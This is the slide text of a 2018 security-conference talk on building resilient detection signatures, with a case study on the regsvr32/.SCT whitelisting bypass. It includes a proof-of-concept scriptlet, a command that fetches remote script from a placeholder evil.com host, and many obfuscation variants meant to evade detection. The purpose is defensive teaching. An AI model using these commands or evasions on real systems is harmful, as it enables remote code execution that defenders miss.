SlideShare una empresa de Scribd logo

SignaturesAreDead Long Live RESILIENT Signatures

D
Daniel Bohannon

Slides from presentation: $SignaturesAreDead = "Long Live RESILIENT Signatures" wide ascii nocase originally released at SANS DFIR Summit 2018. For more information: http://www.danielbohannon.com/presentations/

Tecnología
1 de 98
Descargar para leer sin conexión
$SignaturesAreDead = "Long Live RESILIENT Signatures" wide ascii nocase Daniel Bohannon @danielhbohannon Senior Applied Security Researcher Matthew Dunwoody @matthewdunwoody Senior Security Architect
©2018 FireEye | Private & Confidential whoami 2 s/ami/arewe Daniel Bohannon @danielhbohannon Beard, Coffee & all things Obfuscation Matthew Dunwoody @matthewdunwoody Person
©2018 FireEye | Private & Confidential Experience @ Scale Hundreds of client & customer environments 10+ million endpoints Hundreds of network sensors Millions of malware samples 3 http://pluspng.com/img-png/png-hd-scale-trb-rating-scales-the-review-board-scales-of-justice-png-5600.jpg How we operate to find evil
Outline • • • • • • • 4
Outline • • • • • • • 5
©2018 FireEye | Private & Confidential <script language="DFIR-Speak"> 6 https://kotaku.com/no-jackie-chan-is-not-dead-1762840753 Signature Trigger Rule IOC (Indicator of Compromise) Hunting What do you mean by "words"?
©2018 FireEye | Private & Confidential <script language="DFIR-Speak"> 7 https://kotaku.com/no-jackie-chan-is-not-dead-1762840753 A/V Signature Real-time Trigger IDS/SIEM/Snort/etc. Rule Historical IOC (Indicator of Compromise) Threat Hunting What do you mean by "words"?
©2018 FireEye | Private & Confidential <script language="DFIR-Speak"> 8 What do you mean by "words"?
©2018 FireEye | Private & Confidential <script language="DFIR-Speak"> 9 What do you mean by "words"? Detection –Historical & real-time –Host- & network-based –Language/tool agnostic
©2018 FireEye | Private & Confidential 10 File hashes? File names? IPs/domains? Twitter handles in source code? Signatures & Indicators What are they? What are they not? https://betanews.com/2016/07/28/how-to-print-to-pdf-directly-in-windows-10-no-software-required/
©2018 FireEye | Private & Confidential Spot a Bad Signature 11 "You can hunt with THIS, or you can hunt with THAT…"
©2018 FireEye | Private & Confidential (Don't) Learn from (Bad) Signatures 12 https://follows.com/blog/wp-content/uploads/2018/02/Meme-You-Made-This.jpg This is an IOC This is an IOC That is an IOC? Garbage in, garbage out Threat Feed
©2018 FireEye | Private & Confidential What is a Good Signature? 13 https://www.reddit.com/r/gifs/comments/3e08b7/i_made_this_oc/ And WHO gets to decide? Who DEFINES good signatures? –Vendors? –Salespeople? –Threat feed? –Practitioners? Good signatures are…
©2018 FireEye | Private & Confidential Good Signatures 14 are… More resilient than rigid – Resist evasions and normal changes to TTPs More methodology-based than specific – Capture method or technique rather than specific procedure More proactive than reactive – Identify new methodologies and anticipated evasions
Outline • • • • • • • 15
©2018 FireEye | Private & Confidential Process 16 Overview  Define detection  Assemble a sample set  Test existing detections  Generate data  Write detection  Test and tune http://www.radicalradiationremedy.com/wp- content/uploads/2017/03/4419a4e7c09d3abf08c4f723be2567d2_-coming-soon-think- process-process_800-600.png
©2018 FireEye | Private & Confidential Process 17 Define detection What to find – NewHotness malware, squiblydoo, DNS C2  When to find it – Real time, historical  Where to find it – Endpoints, network, SIEM, sandbox (Who and why should be defined based on historical incidents, threat profile and operational priority. Please consult a qualified intel analyst for more details.) https://www.insightsintoimpact.com/wp- content/uploads/2018/05/process-who-what-why-where.jpg
©2018 FireEye | Private & Confidential Process 18 Define detection How to find it –What tools are applicable and available –What signature formats are supported and best-suited  Snort/Suricata  SIEM query  Yara  Yara + modules  OpenIOC  Stix  ClamAV  Sandbox signature –False positive tolerance
©2018 FireEye | Private & Confidential Process 19 Assemble a Sample Set  Samples representing the thing  Collected – Every available example – All variants and versions  Generated (if applicable) – Run builders, compilers, obfuscators – Develop new variants based on methodology  Try to enumerate the entire problem set – Don’t stop at the most common examples https://www.zedge.net/wallpaper/e532419 c-4a75-4d6c-869b-eb422735dcd9 Set Bonus
©2018 FireEye | Private & Confidential Process 20 Test Existing Detections  Test existing detection capabilities for any free wins – Test safely, ideally outside of prod – Inform stakeholders  Adjust priority of applicable existing detections – Generic.PwShell.RefA.1B61FA61 == invoke-mimikatz – Gen:Variant.Ursu.120152 == ChopStick  Fill gaps in existing capabilities  Extend detection to other media / engines
©2018 FireEye | Private & Confidential Process 21 Generate Data  Generate data – Logs – PCAP – Binary metadata – Strings  This may not be necessary for plain text http://www.startrek.com/uploads/assets/db_articles/26da32597d9bd37fde9d a22660aa524f24fd725c.jpg
©2018 FireEye | Private & Confidential Process 22 Write detection  Start broad and tune down  Many detections can be translated between type  Be mindful of, and challenge, assumptions  Actively try to bypass methodology-based detections  May need specific rules to capture specific cases https://www.timeshighereducation.com/sites/default/files/styles/the_breaking_news_ image_style/public/person-writing-letter-with-metal-quill.jpg?itok=lCt7Bo6c
©2018 FireEye | Private & Confidential Process 23 Test  FN testing against sample set – Gotta catch em all  FP testing against legit data – Start small, tune to FP target, increase scale, iterate – Re-test against samples to validate tuning – If compromise to hit FP target, document what is missed  Test against new TPs that are identified during testing or deployment – Do all of the detections catch it? https://blog.essaytigers.com/wp- content/uploads/failed-exam-491x350.jpg
Outline • • • • • • • 24
©2018 FireEye | Private & Confidential Binaries 25 Background Attackers still use malicious binaries Malware changes frequently – Polymorphic – Builders – Version updates Can’t always rely on AV – AV sigs lag – Easy to test against, easy to bypass – Can’t always submit malware to vendors ML is great but it depends on the model and implementation - doesn’t detect everything Validate the effectiveness of existing detection Intelligence gathering, eg. VT retrohunt
©2018 FireEye | Private & Confidential Binaries 26 Background Existing detection/protection ineffective AND: – Active intrusion – High-priority threat – Prolific or publicly-available malware Need additional context beyond “it’s bad” Intel gathering, tagging, etc. https://medium.com/@dunstconsulting/the-different-types-of-malware-analysis-c9bfbaa44739
©2018 FireEye | Private & Confidential Binaries 27 Define Detection Example: –What: All Chopstick malware variants –Where: Endpoint, network, sandbox –When: Historical and real-time –How: Yara + modules, OpenIOC, Snort, SIEM, EDR –False positive tolerance: Moderate http://4.bp.blogspot.com/- FzMgc7Y015s/U9VZdexxSJI/AAAAAAAAAJ4/9QOwiRu- K6g/s1600/diningtips04.jpg
©2018 FireEye | Private & Confidential Binaries 28 Assemble a Sample Set For attacker malware, collect as many samples as possible, from as many variants as possible – Collect hashes from high-confidence sources  Threat intel feeds  Public malware repos  Malware analysis reports –VirusTotal Intelligence – Implant builders  Blogs https://attack.mitre.org/wiki/Software/S0023
©2018 FireEye | Private & Confidential Binaries 29 Assemble a Sample Set For public malware, generate representative samples – Use multiple versions, if updates are available – Generate variants for all of the significant options in a builder  Focus on options that impact the structure, behavior or network comms of the malware – Use common packers and obfuscators  UPX  ConfuserEx (.Net) https://funnyjunk.com/funny_pictures/3434944/Awesome+starwars/167
©2018 FireEye | Private & Confidential Binaries 30 Test Existing Detections  Test – Scan with static engines (AV / ML) – Run on isolated test system for real-time / dynamic – Replay PCAP through IDS – Run in sandbox  What alerts are generated?  What data is produced?  Stop here or continue? http://www.educationviews.org/wp-content/uploads/2017/03/petri-dish-used-for_f5f2b18d-d028- 4921-9ad0-938bb9d3720b.jpg
©2018 FireEye | Private & Confidential Binaries 31 Generate data Collect dynamic execution details – Sandbox reports – Online sandboxes, vendor sandboxes, Cuckoo – Malware reports and blogs – Manual dynamic analysis – Process memory / strings – PCAP capture Parse binaries using tools – PEExplorer, CFF Explorer, others – SigCheck – FLOSS / Strings – Vendor analysis engine
©2018 FireEye | Private & Confidential Binaries 32 Write Detection  Group samples based on data – Windows vs. OSX vs. *nix – EXE vs. DLL version – Different import hashes Look for outliers that may not belong Look for commonalities across remaining samples Divide further when commonalities break down https://www.computerhope.com/jargon/s/sort.htm
©2018 FireEye | Private & Confidential Binaries 33 Write Detection Look for common elements within each group and across groups Dynamic execution items – Persistence – Mutex – Named pipe – C2 – Handle to config file/reg – String decoded in memory – Injection into a known process Resources Export name Size range Export timestamp PE timestamp Import hash PE characteristics Strings Hex strings Authenticode signature Imports/exports Sections/non- section data Version info
©2018 FireEye | Private & Confidential Binaries 34 Write Detection Look for common elements within each group and across groups Dynamic execution items – Persistence – Mutex – Named pipe – C2 – Handle to config file/reg – String decoded in memory – Injection into a known process Resources Export name Size range Export timestamp PE timestamp Import hash PE characteristics Strings Hex strings Authenticode signature Imports/exports Sections/non- section data Version info  Literally anything else available tools support
©2018 FireEye | Private & Confidential Binaries 35 Write Detection Use common elements as starting point – If it detects all known versions, based on common elements, increases the chance of catching future versions Use behavior-based detections where possible Incorporate both structure of malware and attacker TTPs in deploying/using it Add in weaker detections (hashes, domains, etc.) Make signatures as broad as possible, and detect in as many ways as possible, with acceptable FP rate
©2018 FireEye | Private & Confidential Binaries 36 Test Run it! – Against sample set – Against clean systems – Against corpus of malware & binaries  VT retrohunt, WSUS, etc. – Test environment (if available) – Production test Review hits, update (for TPs & FPs) and iterate Keep the rule as broad as possible while maintaining FP rate https://img.memecdn.com/run-fail_o_2718843.webp
Outline • • • • • • • 38
©2018 FireEye | Private & Confidential Regsvr32.exe + .SCT 39 Found by Casey Smith (@subTee) in 2016 App whitelisting bypass Regsrv32.exe to execute local or remote .SCT file scripting contents What's this SquiblyDoo you speak of? Detection opportunities: –Regsvr32.exe execution  Arguments  .DLL loads  Network connection –.SCT file contents  Network & Host
©2018 FireEye | Private & Confidential Regsvr32.exe + .SCT 40 The original POC <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> bla.sct Command regsvr32.exe /s /n /u /i:http://evil.com/bla.sct scrobj.dll
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 41 #KnowYourOptions Command  regsvr32.exe  /s /n /u /i:http://  .sct  scrobj.dll regsvr32.exe /s /n /u /i:http://evil.com/bla.sct scrobj.dll
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 42 #KnowYourOptions Command  regsvr32.exe  /s /n /u /i:http://  .sct  scrobj.dll regsvr32.exe /s /n /u /i:http:evil.com/bla.sct scrobj.dll
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 43 #KnowYourOptions regsvr32.exe /s /n /u /i:https:evil.com/bla.sct scrobj.dll Command  regsvr32.exe  /s /n /u /i:http:  .sct  scrobj.dll
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 44 #KnowYourOptions regsvr32.exe /s /n /u /i:https:evil.com/bla.sct scrobj.dll Command  regsvr32.exe  /s /n /u /i:http  .sct  scrobj.dll  /i:http:  /i:https  /i:ftp:  /i:remotec$  /i:C:Tempbla.sct  /i:bla.sct
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 45 #KnowYourOptions regsvr32.exe /s /n /u /i:https:evil.com/bla.sct scrobj.dll Command  regsvr32.exe  /s /n /u /i:http  .sct  scrobj.dll
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 46 #KnowYourOptions regsvr32.exe /u /n /s /i:https:evil.com/bla.sct scrobj.dll Command  regsvr32.exe  /s .  /n .  /u .  /i:http  .sct  scrobj.dll
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 47 #KnowYourOptions regsvr32.exe /u /i:https:evil.com/bla.sct /n scrobj.dll /s Command  regsvr32.exe  /s .  /n .  /u .  /i:http  .sct  scrobj.dll
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 48 #KnowYourOptions regsvr32.exe /u /i:https:evil.com/bla.sct /n scrobj.dll /s Command  regsvr32.exe  /s .  /n .  /u .  /i:http  .sct  scrobj.dll /n – Do not call DllRegisterServer or DllUnregisterServer; this option must be used with /i.
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 49 #KnowYourOptions regsvr32.exe /u /i:https:evil.com/bla.sct scrobj.dll /s Command  regsvr32.exe  /s .  /n .  /u .  /i:http  .sct  scrobj.dll /n – Do not call DllRegisterServer or DllUnregisterServer; this option must be used with /i.  FALSE! Not required 
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 50 #KnowYourOptions regsvr32.exe /u /i:https:evil.com/bla.sct scrobj.dll /s Command  regsvr32.exe  /s .  /u .  /i:http  .sct  scrobj.dll /n – Do not call DllRegisterServer or DllUnregisterServer; this option must be used with /i.  FALSE! Not required 
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 51 #KnowYourOptions regsvr32.exe /u /i:https:evil.com/bla.sct scrobj.dll /s Command  regsvr32.exe  /s .  /u .  /i:http  .sct  scrobj.dll
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 52 #KnowYourOptions regsvr32.exe -u -i:https:evil.com/bla.sct scrobj.dll -s Command  regsvr32.exe  /s or -s.  /u or -u .  /i:http or -i:http  .sct  scrobj.dll
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 53 #KnowYourOptions regsvr32.exe -u -i:https:evil.com/bla.sct scrobj.dll -s Command  regsvr32.exe  /s or -s.  /u or -u .  /i:http or -i:http  .sct  scrobj.dll
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 54 #KnowYourOptions regsvr32 -u -i:https:evil.com/bla scrobj -s Command  regsvr32.exe  /s or -s.  /u or -u .  /i:http or -i:http  .sct  scrobj.dll
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 55 #KnowYourOptions regsvr32 -u -i:https:evil.com/bla scrobj -s Command  regsvr32  /s or -s.  /u or -u .  /i:http or -i:http  scrobj
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 56 #KnowYourOptions regsvr32 -u -i:https:evil.com/bla scrobj -s Command  regsvr32  /s or -s.  /u or -u .  /i:http or -i:http  scrobj
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 57 #KnowYourOptions regsvr32 -u -i:https:evil.com/bla scrobj -s Command  regsvr32  /s or -s.  /u or -u .  /i:http or -i:http  scrobj C:> copy regsvr32.exe casey.exe C:> copy scrobj.dll smith.dll Renaming
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 58 #KnowYourOptions casey -u -i:https:evil.com/bla smith -s Command  regsvr32  /s or -s.  /u or -u .  /i:http or -i:http  scrobj C:> copy regsvr32.exe casey.exe C:> copy scrobj.dll smith.dll Renaming
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 59 #KnowYourOptions casey -u -i:https:evil.com/bla smith -s Command  /s or -s.  /u or -u .  /i:http or -i:http
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 60 #KnowYourOptions casey -u -i:https:evil.com/bla smith -s Command  /s or -s .  /u or -u .  /i:http or -i:http
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 61 #KnowYourOptions casey -ugh... -i:https:evil.com/bla smith -s Command  /s or -s .  /u or -u .  /i:http or -i:http
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 62 #KnowYourOptions casey -ugh... -i:https:evil.com/bla smith -stop-it! Command  /s or -s .  /u or -u .  /i:http or -i:http
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 63 #KnowYourOptions casey -ugh... -i:https:evil.com/bla smith -stop-it! Command  /s or -s  /u or -u  /i:http or -i:http
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 64 #KnowYourOptions casey "-"ugh... -i:https:evil.com/bla smith -""stop-it! Command  /s or -s  /u or -u  /i:http or -i:http
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 65 #KnowYourOptions casey "-"ugh... -"i":ht""tps:evil.com/bla smith -""stop-it! Command  /s or -s  /u or -u  /i:http or -i:http https://imgur.com/gallery/Vs7D1QO
©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 66 Different approaches pay off… Command http://knowyourmeme.com/memes/happy-cat I CAN HAS MAGIC REGEX? Arguments w/o obfuscation Handle obfuscation separately Handle renamed .exe/.dll separately Regsvr32.exe network connections Regsvr32.exe image load events –Jscript.dll, jscript9.dll, vbscript.dll Regsvr32.exe args over the network
Outline • • • • • • • 67
©2018 FireEye | Private & Confidential Detecting .SCT Content 68 YARA fans & network analysts awaken… <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> bla.sct Command regsvr32.exe /s /n /u /i:http://evil.com/bla.sct scrobj.dll
©2018 FireEye | Private & Confidential Detecting .SCT Content 69 YARA fans & network analysts awaken… <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker
©2018 FireEye | Private & Confidential Detecting .SCT Content 70 YARA fans & network analysts awaken… <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker
©2018 FireEye | Private & Confidential Detecting .SCT Content 71 YARA fans & network analysts awaken… <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required?
©2018 FireEye | Private & Confidential Detecting .SCT Content 72 YARA fans & network analysts awaken… <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required?
©2018 FireEye | Private & Confidential Detecting .SCT Content 73 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <script language="JScript"> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required?
©2018 FireEye | Private & Confidential Detecting .SCT Content 74 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <script language="JScript"> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change?
©2018 FireEye | Private & Confidential Detecting .SCT Content 75 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <script language="JScript"> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change?
©2018 FireEye | Private & Confidential Detecting .SCT Content 76 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{F0001111-0000-0000-0000-0000FEEDACDC}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change?
©2018 FireEye | Private & Confidential Detecting .SCT Content 77 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{F0001111-0000-0000-0000-0000FEEDACDC}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? https://commons.wikimedia.org/wiki/File:Acdc_logo_band.svg
©2018 FireEye | Private & Confidential Detecting .SCT Content 78 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{FDB01111-0000-0000-0000-0000FEEDACDC}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? https://commons.wikimedia.org/wiki/File:Acdc_logo_band.svg
©2018 FireEye | Private & Confidential Detecting .SCT Content 79 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{FDB0FDB0-0000-0000-0000-0000FEEDACDC}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? https://commons.wikimedia.org/wiki/File:Acdc_logo_band.svg
©2018 FireEye | Private & Confidential Detecting .SCT Content 80 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{FDB0FDB0-FDB0-FDB0-FDB0-0000FEEDACDC}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? https://commons.wikimedia.org/wiki/File:Acdc_logo_band.svg
©2018 FireEye | Private & Confidential Detecting .SCT Content 81 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? https://commons.wikimedia.org/wiki/File:Acdc_logo_band.svg
©2018 FireEye | Private & Confidential Detecting .SCT Content 82 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change?
©2018 FireEye | Private & Confidential Detecting .SCT Content 83 YARA fans & network analysts awaken… <?XML?> <component> <registration classid='{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </component> bla.sct What's common? (there by default) #lazyhacker What's required? What can change?
©2018 FireEye | Private & Confidential Detecting .SCT Content 84 YARA fans & network analysts awaken… <?XML?> <component> <registration classid='{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </component> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? JScript VBScript JScript.Encode VBScript.Encode #@~^NAAAAA==O•/O,',ZD•lDnr(LnmD`E UmDb2Yc?t•ssJ*R"EU`E^mV^ R•a+r#ahEAAA==^#~@
©2018 FireEye | Private & Confidential Detecting .SCT Content 85 YARA fans & network analysts awaken… <?XML?> <component> <registration classid='{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}'> <script > var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </component> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? JScript VBScript JScript.Encode VBScript.Encode #@~^NAAAAA==O•/O,',ZD•lDnr(LnmD`E UmDb2Yc?t•ssJ*R"EU`E^mV^ R•a+r#ahEAAA==^#~@
©2018 FireEye | Private & Confidential Detecting .SCT Content 86 YARA fans & network analysts awaken… <?XML ?> <component > <registration classid = '{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}' > <script > var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script > </registration > </component > bla.sct What's common? (there by default) #lazyhacker What's required? What can change? What can be added?
©2018 FireEye | Private & Confidential Detecting .SCT Content 87 YARA fans & network analysts awaken… <?XML ?> <component > <registration classid = '{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}' > <script > var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script > </registration > </component > bla.sct What's common? (there by default) #lazyhacker What's required? What can change? What can be added? var r = new ActiveXObject ( "WScript.Shell" ) . Run ( "calc.exe" ) ;
©2018 FireEye | Private & Confidential Detecting .SCT Content 88 YARA fans & network analysts awaken… <?XML ?><component ><registration classid = '{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}' ><script >var r = new ActiveXObject ( "WScript.Shell" ) . Run ( "calc.exe" ) ; </script ></registration ></component > bla.sct What's common? (there by default) #lazyhacker What's required? What can change? What can be added?
©2018 FireEye | Private & Confidential Detecting .SCT Content 89 Different approaches pay off… <?XML ?><component ><registration classid = '{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}' ><script >var r = new ActiveXObject ( "WScript.Shell" ) . Run ( "calc.exe" ) ; </script ></registration ></component > bla.sct Network detections: –Download over HTTP –Transfer over SMB Host detections: –Downloaded .SCT file (extension doesn’t matter) in  Temporary Internet Files  INetCache
©2018 FireEye | Private & Confidential Detecting .SCT Content 90 Different approaches pay off… Command http://knowyourmeme.com/memes/happy-cat I CAN HAS MAGIC REGEX? Script w/o obfuscation Handle obfuscation separately Focus on default strings (lazy attacker) Focus on anchors (“<registration”) with ABSENCE of default strings Detections against scripting content payload regardless of .SCT wrapper –DotNetToJScript
Outline • • • • • • • 91
©2018 FireEye | Private & Confidential Proactive Detection 92 Hunting Form a hypothesis of a way to find evil and test – Gather data and conduct analysis Find evil vs. define detection for evil Synergy! –Hunt to validate detection –Develop detection based on hunt result https://www.usatoday.com/story/news/2018/08/28/grizzly- hunt-pits-tourists-against-sportsmen-wyoming/1065854002/
©2018 FireEye | Private & Confidential Proactive Detection 93 Hunting One output of a hunt should be new detections – Blacklist evil or whitelist good Detections that do not meet the target FP tolerance should become hunts If you’re hunting for the same things over and over, consider automating that process into a detection https://press-start.com.au/news/pcmac/2017/03/09/duck-hunt-inspired-game-coming-vr/ I may have had the Duck Hunt high score the last time I was at BruCon
©2018 FireEye | Private & Confidential Proactive Detection 94 Detect across the attack lifecycle Initial Compromise Establish Foothold Escalate Privileges Internal Recon Complete Mission Move Laterally Maintain Presence • Backdoor variants • VPN subversion • Sleeper malware • Net use commands • Reverse shell access • Social engineering • External compromise • Custom malware • C2 • App exploitation • Credential theft • Password cracking • “Pass-the-hash” • Critical system recon • System, Active Directory, and user enumeration • Staging servers • Data consolidation • Data theft
©2018 FireEye | Private & Confidential Proactive Detection 95 Where else do our detection ideas come from? Active and historic attacker activity in hundreds of Incident Response engagements and managed service customers Analyzing malware samples from engagements and malware repositories (internal/external) Intel (the good kind) Open source research - Twitter, Github, vendor blog posts, etc. (Github history is an invaluable resource) Crazy whims – IWHO (“I Wonder How Often…”)
Outline • • • • • • • 96
©2018 FireEye | Private & Confidential Takeaways 97 I’ll take mine to go Know what you are detecting today and HOW you are detecting it – What data sources? – What toolsets? – What timeframes (lag time to actionable alert/data)? Know your assumptions about attacker techniques and your own visibility Capture result of hunts as new detections
©2018 FireEye | Private & Confidential Takeaways 98 Second helping Know your tools – Validate data sources with more than one tool – Understand limitations of toolsets and/or artifacts and compensate elsewhere (build your own, open source tooling, etc.) Automate repetitive tasks to free you up to more effectively develop methodology-based detections – Initial idea and detection development – Tuning/scrapping/rebuilding of detection – Monitoring and tuning going forward for detection
Thank You! @matthewdunwoody @danielhbohannon 99

Recomendados

Invoke-DOSfuscation
Invoke-DOSfuscationInvoke-DOSfuscation
Invoke-DOSfuscationDaniel Bohannon
 
Malicious Payloads vs Deep Visibility: A PowerShell Story
Malicious Payloads vs Deep Visibility: A PowerShell StoryMalicious Payloads vs Deep Visibility: A PowerShell Story
Malicious Payloads vs Deep Visibility: A PowerShell StoryDaniel Bohannon
 
DevSec Defense
DevSec DefenseDevSec Defense
DevSec DefenseDaniel Bohannon
 
Revoke-Obfuscation
Revoke-ObfuscationRevoke-Obfuscation
Revoke-ObfuscationDaniel Bohannon
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
 
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellPesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellDaniel Bohannon
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
 

Recomendados

Invoke-DOSfuscation
Invoke-DOSfuscationInvoke-DOSfuscation
Invoke-DOSfuscationDaniel Bohannon
 
Malicious Payloads vs Deep Visibility: A PowerShell Story
Malicious Payloads vs Deep Visibility: A PowerShell StoryMalicious Payloads vs Deep Visibility: A PowerShell Story
